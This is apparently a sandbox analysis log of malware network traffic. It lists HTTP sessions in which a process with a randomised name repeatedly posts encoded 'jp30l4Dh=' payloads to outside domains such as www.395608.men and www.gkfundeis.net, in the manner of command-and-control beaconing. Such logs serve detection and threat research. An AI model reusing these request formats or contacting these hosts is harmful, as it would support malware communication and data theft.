                                                              Data Ascii: jp30l4Dh=mQlJ43QWk2uw3qKVZjorDjJ6ZpABV9bVb6mIo4b8q6jWG1Uy9Ybiiou6BkeJ8yvMKtZ2x+r9JG7F/LlzoRSzkv0dixVgZXSICCYIcGclTaqhQsWDUA6u+bNk0dAbvhsksLipjfx+LIYbuC231nfGqJjK0pjZC96P9gM/KWF2CtmrdTe0nsqWJJrCc2oJ3VTpSMpXWEo4iRuCkHwDDtdowXbM4ngYdrunbbEXGJT7m7QTu1hBFHbobJm+3DATRPkokOz6iUa/4S89XwGCkqwVM81DhJQUQVgc74J7AnO8P3cOPH2kCe42tXHl00jK3AB80pbHStMKG5/b4oM39ZQjHS/PipE/rboDfRSuZs7SMOnn20ELKSOl8HBMFEBBvhx+IE964kBAmEnWv7wJ8A4eoxquw+TmDh9vygJBcqNqR0G0qSl+X2aZy6TzIBoWstW0Ja/EpVWuHKkucJb58wx7DRSn1/4jg51ATWQnJk2iGoOIBb2vaVSXWg5fQ6wMjCV3BrfzhTWDtkPyfpfLzhOUOnL0rHW4ALNZIQNDBgdKArtYtab6MwqeMP/nrYsoCF6Jnz7kNkHtVeBRd9QxboFPm6GrR1sYfqkdCAiYanNCTSKk8rhJGSgQJxrUR0fFdbZwsPz1zAclyjlEcnTFg8/v8q3DPmm85qfbvv9L0AnDEAqKCl9zVZ63+LbcvyQXgVPQ6AakiD+71MOXkMNpeV0Vdp125wvmxkgNpjW0KwaQhq1jV2GiBik8lR5f1n/2Hsjw5BSHVYkrU9D5hS2vLPFVozsr6FpOG7Ot4KMd42gk/uj7KoIaPEALPUC/gM8UHtWHe7tde1Hq9mzslwEzfdpT6bCwkuJPdye/gT5iaCZXb03nglsu6gOzQeRynWwdCL0cduTSwFmAi4sKSIxbQA1a+mNE9g1ghT9gSnHRACmEbJ4+ummtSOFzEE5CqyQ3xkUup1ojDyaxwxUfDuApqGF1h4q4xj4UkKxL8I1Pe77nAPE [TRUNCATED]
                                                              Nov 24, 2024 08:35:27.304543972 CET1236INHTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:27 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:27.304569960 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.74990766.29.148.7880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:28.704195976 CET464OUTGET /o7bo/?jp30l4Dh=rSNp7HYcuB/095ykRTgGSysZZq4Xde7QSp6ZurvXibSiMmwLx7Dds9OPAwuR2izgPvluyMujHD+7ybxpuR33pblwowpnCmWgEXw5Rhc3WsmHQKO6UjX33qMhz5kj31YRr7iTj/VwMpww&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.dialagiaja18.buzz
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:35:29.960447073 CET1236INHTTP/1.1 404 Not Found
                                                              keep-alive: timeout=5, max=100
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1251
                                                              date: Sun, 24 Nov 2024 07:35:29 GMT
                                                              server: LiteSpeed
                                                              x-turbo-charged-by: LiteSpeed
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                              Nov 24, 2024 08:35:29.960505962 CET224INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                              Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting co
                                                              Nov 24, 2024 08:35:29.960515976 CET92INData Raw: 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64
                                                              Data Ascii: mpany and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.749923207.148.38.1980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:36.389164925 CET716OUTPOST /vje0/ HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.395608.men
                                                              Referer: http://www.395608.men/vje0/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 78 36 57 6e 76 33 4b 44 71 72 6b 55 34 4e 52 6d 32 36 35 41 39 65 63 54 76 6b 70 5a 37 62 38 4a 4b 6b 4c 2b 76 6d 43 51 6d 44 75 64 46 68 7a 77 71 4a 73 5a 55 61 6f 33 43 61 34 56 4e 70 31 4f 72 74 6a 49 7a 53 42 61 41 63 56 50 76 34 4b 49 4d 50 34 58 47 63 4b 49 6e 56 66 6a 47 39 72 67 43 6a 36 43 39 46 6d 6d 42 4e 76 43 6e 32 66 46 37 4b 7a 5a 51 37 68 2b 4e 76 49 70 76 2b 75 62 75 2b 78 56 4c 36 6d 6f 77 76 34 6e 41 46 31 58 37 61 6d 48 4b 6e 4f 70 36 74 2b 51 58 5a 72 33 68 48 57 43 4c 7a 64 4c 44 49 61 6c 47 77 69 4a 72 7a 48 64 43 42 56 77 65 61 67 39 75 74 45 42 39 6e 69 62 6f 41 3d 3d
                                                              Data Ascii: jp30l4Dh=CirUhdcxatOzx6Wnv3KDqrkU4NRm265A9ecTvkpZ7b8JKkL+vmCQmDudFhzwqJsZUao3Ca4VNp1OrtjIzSBaAcVPv4KIMP4XGcKInVfjG9rgCj6C9FmmBNvCn2fF7KzZQ7h+NvIpv+ubu+xVL6mowv4nAF1X7amHKnOp6t+QXZr3hHWCLzdLDIalGwiJrzHdCBVweag9utEB9niboA==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.749930207.148.38.1980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:39.053653002 CET736OUTPOST /vje0/ HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.395608.men
                                                              Referer: http://www.395608.men/vje0/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 77 61 47 6e 67 77 2b 44 37 37 6b 58 39 4e 52 6d 39 61 35 45 39 65 51 54 76 6d 59 63 34 70 49 4a 4b 42 33 2b 31 6e 43 51 68 44 75 64 4b 42 79 62 33 5a 73 6f 55 61 6b 2f 43 66 51 56 4e 70 78 4f 72 76 37 49 7a 6c 56 5a 42 4d 56 33 6a 59 4b 77 50 2f 34 58 47 63 4b 49 6e 56 4b 2b 47 2b 62 67 65 44 71 43 73 55 6d 6c 4c 74 76 42 67 32 66 46 78 71 79 53 51 37 68 63 4e 74 38 50 76 38 57 62 75 37 64 56 4c 6f 66 61 36 76 35 69 66 56 31 48 2f 37 4c 2b 49 46 47 30 30 4c 6d 47 54 4c 66 4b 74 52 58 67 52 52 52 6e 64 5a 69 65 43 79 47 2f 38 56 61 6f 41 41 52 6f 54 34 55 63 78 61 68 72 77 31 44 66 2b 2b 48 5a 41 32 31 4e 33 68 37 7a 35 4e 74 64 77 47 4d 58 38 36 63 3d
                                                              Data Ascii: jp30l4Dh=CirUhdcxatOzwaGngw+D77kX9NRm9a5E9eQTvmYc4pIJKB3+1nCQhDudKByb3ZsoUak/CfQVNpxOrv7IzlVZBMV3jYKwP/4XGcKInVK+G+bgeDqCsUmlLtvBg2fFxqySQ7hcNt8Pv8Wbu7dVLofa6v5ifV1H/7L+IFG00LmGTLfKtRXgRRRndZieCyG/8VaoAARoT4Ucxahrw1Df++HZA21N3h7z5NtdwGMX86c=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.749939207.148.38.1980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:41.710814953 CET1749OUTPOST /vje0/ HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.395608.men
                                                              Referer: http://www.395608.men/vje0/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 77 61 47 6e 67 77 2b 44 37 37 6b 58 39 4e 52 6d 39 61 35 45 39 65 51 54 76 6d 59 63 34 70 51 4a 4b 7a 50 2b 32 41 2b 51 67 44 75 64 48 68 79 59 33 5a 73 31 55 61 4d 37 43 66 55 72 4e 72 5a 4f 71 4b 6e 49 37 30 56 5a 4c 4d 56 33 72 34 4b 4c 4d 50 35 54 47 64 6e 42 6e 56 61 2b 47 2b 62 67 65 47 6d 43 38 31 6d 6c 4e 74 76 43 6e 32 66 5a 37 4b 7a 31 51 37 35 6d 4e 75 51 66 75 49 69 62 75 62 4e 56 49 62 6e 61 79 76 35 67 65 56 30 59 2f 37 48 66 49 46 61 53 30 4c 36 6f 54 4c 6e 4b 6f 77 6d 70 4c 7a 35 71 43 70 4b 72 4d 55 54 59 71 6a 65 37 4f 7a 64 56 5a 35 38 48 38 70 56 53 6f 45 44 33 2f 2b 47 63 65 56 70 61 76 6c 4c 78 77 62 6b 7a 6b 33 55 54 39 73 74 57 6e 54 47 44 6c 73 6a 63 74 48 48 35 32 77 6f 38 54 57 56 57 4a 72 56 6f 6e 6e 71 4b 35 72 32 63 62 67 4c 6f 32 49 79 75 76 67 46 62 67 6a 68 77 58 47 46 62 2f 53 62 57 52 4d 47 5a 31 77 4a 34 31 51 43 46 6e 46 41 58 4f 52 64 33 63 65 4e 51 7a 6d 59 39 50 63 71 39 62 54 69 51 62 62 31 79 69 [TRUNCATED]
                                                              Data Ascii: jp30l4Dh=CirUhdcxatOzwaGngw+D77kX9NRm9a5E9eQTvmYc4pQJKzP+2A+QgDudHhyY3Zs1UaM7CfUrNrZOqKnI70VZLMV3r4KLMP5TGdnBnVa+G+bgeGmC81mlNtvCn2fZ7Kz1Q75mNuQfuIibubNVIbnayv5geV0Y/7HfIFaS0L6oTLnKowmpLz5qCpKrMUTYqje7OzdVZ58H8pVSoED3/+GceVpavlLxwbkzk3UT9stWnTGDlsjctHH52wo8TWVWJrVonnqK5r2cbgLo2IyuvgFbgjhwXGFb/SbWRMGZ1wJ41QCFnFAXORd3ceNQzmY9Pcq9bTiQbb1yi6Z0hioJwlFfXEbmxQ8m1MpArdGQ8OWhNaLkw/zY2w0NPvb71H7dQHil4RRBgJ5lVpMl3x6hyTLKzsjMo0AvwaGFC5PbCJoWw/0TZkeHP8VI0/XczyEDdrYvwNVWdbOat0mSuUXs39PgT/yTLz0YKqhahOk6hjEjia9tT6teWmCp5RkXEf9qZcMb+9okHv18QXGmvaykEFTgJgsgqf5aCnRuaQN2Up/zz422IG6rpFMiU8U+ZoEncgjXi1M7Dy2wJX1ORlRYgQFmaBrstn5TcD+Ar81biISCAnqncLiotOcK+ur3OYjk/QKORvwZCN+cOJUU1hnRmT3gdjN+lIMBTp90id3e2rempK7AR2lo7Q9ZjdWhvYh5Vk7fer6MG6F2aQoSLmLtnk/YajFKp0Rg3GyvVcSFuGGqnYmn/JyHPnuRbCa1+N8sSdRemOBNJjhNLbjABls4ICVvc5dPzGpTvDpQpO6RZrJJ/k85ovECBhj3r8cL/u9hM2fD79QZaRvI3D961O3IcHQBOd+f+hEbOfM2yvtjC32JN+gWAeTq3a4rAdhfVXZ8SlGf7gMS4tfNwAiB3iTIXWI0tEW7QINI55/9jezwYoO0XoAXEXTGrFejtdV77eeh8mQTD18Y1HIGlYXqdu8TlNfwhbOeXAQ0qcFsENBE/yZuWr/ [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.749946207.148.38.1980520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:44.361748934 CET457OUTGET /vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Nov 24, 2024 08:35:46.098805904 CET664INHTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:35:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 479
                                                              Connection: close
                                                              ETag: "651a865d-1df"
                                                              Server: cdn
                                                              X-Cache-Status: MISS
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 [TRUNCATED]
                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.74996262.116.130.880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:52.174568892 CET725OUTPOST /zd1g/ HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.gkfundeis.net
                                                              Referer: http://www.gkfundeis.net/zd1g/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 58 74 62 42 76 62 67 63 4a 62 72 6a 4e 57 6b 6a 64 4c 61 75 2b 48 4b 71 4f 5a 64 42 52 34 53 71 79 4e 61 39 77 4a 57 6e 50 67 34 4e 2f 49 47 54 6e 7a 4e 41 6b 57 53 73 44 63 7a 45 54 78 49 6f 58 33 72 6b 63 43 63 70 33 48 32 38 6f 39 62 65 6b 59 41 31 53 54 52 78 76 50 36 62 77 7a 49 55 49 46 66 65 4f 61 46 47 39 4e 42 69 6f 79 39 35 38 53 76 7a 50 33 61 54 31 2b 58 54 69 6c 4c 73 56 75 74 71 34 54 63 77 74 6d 4b 4a 63 54 6c 58 7a 4e 51 4c 44 48 4f 58 68 35 35 62 2f 67 67 51 32 4e 42 2f 44 46 6c 4b 76 59 54 67 43 6e 4c 69 50 53 44 37 44 77 79 75 38 36 46 43 44 72 58 55 7a 2f 5a 42 41 3d 3d
                                                              Data Ascii: jp30l4Dh=KIF/4Uzdz85BCXtbBvbgcJbrjNWkjdLau+HKqOZdBR4SqyNa9wJWnPg4N/IGTnzNAkWSsDczETxIoX3rkcCcp3H28o9bekYA1STRxvP6bwzIUIFfeOaFG9NBioy958SvzP3aT1+XTilLsVutq4TcwtmKJcTlXzNQLDHOXh55b/ggQ2NB/DFlKvYTgCnLiPSD7Dwyu86FCDrXUz/ZBA==
                                                              Nov 24, 2024 08:35:53.481556892 CET413INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:35:53 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.74996962.116.130.880520C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 24, 2024 08:35:55.163640022 CET745OUTPOST /zd1g/ HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.gkfundeis.net
                                                              Referer: http://www.gkfundeis.net/zd1g/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 33 39 62 53 63 44 67 55 4a 62 6f 2f 39 57 6b 74 39 4c 42 75 2b 4c 4b 71 4b 49 61 47 6b 51 53 72 58 70 61 2b 31 6c 57 6b 50 67 34 47 66 49 66 4e 58 7a 4b 41 6b 61 67 73 47 6b 7a 45 54 31 49 6f 53 7a 72 6b 76 61 66 6f 6e 48 30 69 49 39 5a 51 45 59 41 31 53 54 52 78 76 61 52 62 77 62 49 56 34 31 66 65 73 7a 33 64 64 4e 43 6c 6f 79 39 76 38 53 6a 7a 50 33 30 54 77 6d 39 54 67 64 4c 73 56 65 74 71 74 6e 64 6e 64 6d 4d 45 38 53 61 59 7a 68 66 4d 44 4c 33 57 33 70 61 63 66 34 5a 63 67 4d 6a 6c 68 4a 4a 55 2b 67 6f 6b 41 44 39 31 70 50 32 35 43 30 71 6a 65 4f 6b 64 30 4f 39 5a 68 65 64 58 31 4e 77 77 78 7a 6c 62 56 4f 6a 43 49 6c 53 48 52 49 64 36 66 6b 3d
